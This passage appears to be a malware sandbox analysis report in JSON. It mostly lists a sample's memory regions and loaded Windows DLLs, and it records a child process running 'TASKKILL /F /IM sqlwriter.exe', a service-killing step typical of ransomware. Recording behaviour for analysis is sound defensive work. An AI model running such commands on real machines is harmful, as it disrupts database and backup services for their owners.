"readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_4246", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:32.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4247", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:32.474", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4248", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:32.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4249", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:32.475", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4250", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:32.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4251", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:32.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4252", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:32.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4253", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:32.477", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4254", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:32.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4255", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:32.478", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4256", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:32.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4257", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:32.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4258", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:32.479", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 9666559, "entry_point": 0, "filename": null, "id": "region_4259", "name": "pagefile_0x00000000007b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8060928, "timestamp": "00:01:32.526", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4260", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:32.527", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4261", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:32.528", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4262", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:32.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_4263", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:32.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4264", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:32.632", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_4265", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:32.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_4266", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:32.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 724991, "entry_point": 0, "filename": null, "id": "region_4267", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:01:32.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 1966080, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4268", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 1966080, "timestamp": "00:01:32.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_4269", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 7012351, "entry_point": 0, "filename": null, "id": "region_4270", "name": "private_0x0000000000670000", "norm_filename": null, "region_type": "private_memory", "start_va": 6750208, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9699328, "type": "region", "version": 1 }, "end_va": 11276287, "entry_point": 0, "filename": null, "id": "region_4271", "name": "pagefile_0x0000000000940000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9699328, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11337728, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_4272", "name": "pagefile_0x0000000000ad0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11337728, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 34013184, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_4273", "name": "private_0x0000000002070000", "norm_filename": null, "region_type": "private_memory", "start_va": 34013184, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4274", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:32.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4275", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:32.635", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_4276", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:01:32.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958920191, "entry_point": 1958685512, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4277", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:32.639", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1958936576, "type": "region", "version": 1 }, "end_va": 1958977535, "entry_point": 1958941850, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4278", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1958936576, "timestamp": "00:01:32.640", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4587519, "entry_point": 0, "filename": null, "id": "region_4279", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:01:32.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_4280", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:01:32.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958346752, "type": "region", "version": 1 }, "end_va": 1958514687, "entry_point": 1958374169, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4281", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958346752, "timestamp": "00:01:32.643", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7143424, "type": "region", "version": 1 }, "end_va": 7405567, "entry_point": 0, "filename": null, "id": "region_4282", "name": "private_0x00000000006d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7143424, "timestamp": "00:01:32.654", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34275328, "type": "region", "version": 1 }, "end_va": 37220351, "entry_point": 34275328, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4283", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34275328, "timestamp": "00:01:32.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_4284", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:01:32.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4285", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:32.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4286", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:32.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4287", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:32.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4288", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:32.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 5177344, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_4289", "name": "private_0x00000000004f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5177344, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 7667712, "type": "region", "version": 1 }, "end_va": 7929855, "entry_point": 0, "filename": null, "id": "region_4290", "name": "private_0x0000000000750000", "norm_filename": null, "region_type": "private_memory", "start_va": 7667712, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37486591, "entry_point": 0, "filename": null, "id": "region_4291", "name": "private_0x0000000002380000", "norm_filename": null, "region_type": "private_memory", "start_va": 37224448, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37945344, "type": "region", "version": 1 }, "end_va": 38207487, "entry_point": 0, "filename": null, "id": "region_4292", "name": "private_0x0000000002430000", "norm_filename": null, "region_type": "private_memory", "start_va": 37945344, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958281216, "type": "region", "version": 1 }, "end_va": 1958342655, "entry_point": 1958289824, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4293", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958281216, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4294", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4295", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:32.682", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1784086528, "type": "region", "version": 1 }, "end_va": 1784700927, "entry_point": 1784215737, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4296", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1784086528, "timestamp": "00:01:32.689", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958248447, "entry_point": 1958155061, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4297", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:32.690", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM sqlwriter.exe /IM sqlwriter.exe ", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_36", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 36, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4298", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:32.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4299", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:32.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4300", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:32.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4301", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4302", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_4303", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 3014655, "entry_point": 0, "filename": null, "id": "region_4304", "name": "private_0x00000000002a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2752512, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 9961472, "type": "region", "version": 1 }, "end_va": 10051583, "entry_point": 9985161, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4305", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 9961472, "timestamp": "00:01:32.933", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 